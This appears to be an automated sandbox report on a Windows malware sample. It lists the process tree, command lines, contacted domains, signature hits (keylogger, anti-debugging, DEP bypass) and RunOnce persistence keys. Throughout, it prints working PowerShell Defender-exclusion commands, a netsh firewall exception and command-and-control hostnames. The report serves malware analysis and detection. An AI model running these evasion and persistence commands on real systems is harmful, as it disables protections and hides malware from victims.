Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | June 21, 2021, 12:37 p.m. | June 21, 2021, 12:40 p.m. |
-
-
AdvancedRun.exe "C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
3532 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\Server.exe" -Force
7112 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\Server.exe" -Force
8300 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\57w10427ebbdUHA4f4f4J20y9.exe" -Force
2508 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\57w10427ebbdUHA4f4f4J20y9.exe" -Force
4376 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\Server.exe" -Force
6324 -
57w10427ebbdUHA4f4f4J20y9.exe "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\57w10427ebbdUHA4f4f4J20y9.exe"
2736-
AdvancedRun.exe "C:\Users\test22\AppData\Local\Temp\b48c2de5-ab39-4bbf-8b57-fce6a08fd355\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\b48c2de5-ab39-4bbf-8b57-fce6a08fd355\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
4620 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\57w10427ebbdUHA4f4f4J20y9.exe" -Force
1844 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\57w10427ebbdUHA4f4f4J20y9.exe" -Force
6272 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\kc7e6re8cC19dqS5Lbcj3d84cZRHu4kfX8G77aBt\svchost.exe" -Force
7880 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\57w10427ebbdUHA4f4f4J20y9.exe" -Force
2416 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\kc7e6re8cC19dqS5Lbcj3d84cZRHu4kfX8G77aBt\svchost.exe" -Force
1636 -
-
timeout.exe timeout 1
5368
-
-
57w10427ebbdUHA4f4f4J20y9.exe "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\57w10427ebbdUHA4f4f4J20y9.exe"
916
-
-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\kc7e6re8cC19dqS5Lbcj3d84cZRHu4kfX8G77aBt\svchost.exe" -Force
6612 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\Server.exe" -Force
3468 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\kc7e6re8cC19dqS5Lbcj3d84cZRHu4kfX8G77aBt\svchost.exe" -Force
6008 -
-
timeout.exe timeout 1
1972
-
-
-
-
AdvancedRun.exe "C:\Users\test22\AppData\Local\Temp\8b366e05-a8a3-4d93-b370-8b88371d7fa6\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\8b366e05-a8a3-4d93-b370-8b88371d7fa6\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
6352 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData\svchost.exe" -Force
2292 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData\svchost.exe" -Force
7224 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\kc7e6re8cC19dqS5Lbcj3d84cZRHu4kfX8G77aBt\svchost.exe" -Force
2688 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData\svchost.exe" -Force
6936 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\kc7e6re8cC19dqS5Lbcj3d84cZRHu4kfX8G77aBt\svchost.exe" -Force
9204 -
-
timeout.exe timeout 1
4216
-
-
-
netsh.exe netsh firewall add allowedprogram "C:\ProgramData\svchost.exe" "svchost.exe" ENABLE
5384
-
-
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
apdocroto.gq | 104.21.14.60 | |
dontreachme.duckdns.org | 46.102.106.151 |
Suricata Alerts
Suricata TLS
No Suricata TLS
suspicious_features | GET method with no useragent header | suspicious_request | GET http://apdocroto.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-B8A00046C7A941058E012A87473EB342.html | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://apdocroto.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-153E31DBDD1ACDF382491ECDBE37689C.html |
domain | dontreachme.duckdns.org |
request | GET http://apdocroto.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-B8A00046C7A941058E012A87473EB342.html |
request | GET http://apdocroto.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-153E31DBDD1ACDF382491ECDBE37689C.html |
description | svchost.exe tried to sleep 179 seconds, actually delayed analysis time by 179 seconds |
file | C:\Users\test22\AppData\Local\Temp\b48c2de5-ab39-4bbf-8b57-fce6a08fd355\test.bat |
file | C:\Users\test22\AppData\Local\Temp\8b366e05-a8a3-4d93-b370-8b88371d7fa6\AdvancedRun.exe |
file | C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\test.bat |
file | C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe |
file | C:\Users\test22\AppData\Local\Temp\8b366e05-a8a3-4d93-b370-8b88371d7fa6\test.bat |
file | C:\Users\test22\AppData\Local\Temp\b48c2de5-ab39-4bbf-8b57-fce6a08fd355\AdvancedRun.exe |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | powershell Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\kc7e6re8cC19dqS5Lbcj3d84cZRHu4kfX8G77aBt\svchost.exe" -Force |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\57w10427ebbdUHA4f4f4J20y9.exe" -Force |
cmdline | powershell Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\Server.exe" -Force |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\kc7e6re8cC19dqS5Lbcj3d84cZRHu4kfX8G77aBt\svchost.exe" -Force |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData\svchost.exe" -Force |
cmdline | netsh firewall add allowedprogram "C:\ProgramData\svchost.exe" "svchost.exe" ENABLE |
cmdline | powershell Add-MpPreference -ExclusionPath "C:\ProgramData\svchost.exe" -Force |
cmdline | cmd.exe /c timeout 1 |
cmdline | "C:\Windows\System32\cmd.exe" /c timeout 1 |
cmdline | "C:\ProgramData\svchost.exe" |
cmdline | powershell Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\57w10427ebbdUHA4f4f4J20y9.exe" -Force |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\Server.exe" -Force |
cmdline | C:\ProgramData\svchost.exe |
file | C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe |
file | C:\ProgramData\svchost.exe |
file | C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe |
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Bypass DEP | rule | disable_dep |
cmdline | "C:\Users\test22\AppData\Local\Temp\8b366e05-a8a3-4d93-b370-8b88371d7fa6\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\8b366e05-a8a3-4d93-b370-8b88371d7fa6\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run |
cmdline | C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe /EXEFilename "C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run |
cmdline | C:\Users\test22\AppData\Local\Temp\b48c2de5-ab39-4bbf-8b57-fce6a08fd355\AdvancedRun.exe /EXEFilename "C:\Users\test22\AppData\Local\Temp\b48c2de5-ab39-4bbf-8b57-fce6a08fd355\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run |
cmdline | "C:\Users\test22\AppData\Local\Temp\b48c2de5-ab39-4bbf-8b57-fce6a08fd355\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\b48c2de5-ab39-4bbf-8b57-fce6a08fd355\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run |
cmdline | netsh firewall add allowedprogram "C:\ProgramData\svchost.exe" "svchost.exe" ENABLE |
cmdline | "C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run |
cmdline | C:\Users\test22\AppData\Local\Temp\8b366e05-a8a3-4d93-b370-8b88371d7fa6\AdvancedRun.exe /EXEFilename "C:\Users\test22\AppData\Local\Temp\8b366e05-a8a3-4d93-b370-8b88371d7fa6\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run |
host | 172.217.25.14 |
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\57w10427ebbdUHA4f4f4J20y9 | reg_value | C:\Program Files\Common Files\System\kc7e6re8cC19dqS5Lbcj3d84cZRHu4kfX8G77aBt\svchost.exe | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\57w10427ebbdUHA4f4f4J20y9 | reg_value | C:\Program Files\Common Files\System\kc7e6re8cC19dqS5Lbcj3d84cZRHu4kfX8G77aBt\svchost.exe | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\57w10427ebbdUHA4f4f4J20y9 | reg_value | C:\Program Files\Common Files\System\kc7e6re8cC19dqS5Lbcj3d84cZRHu4kfX8G77aBt\svchost.exe |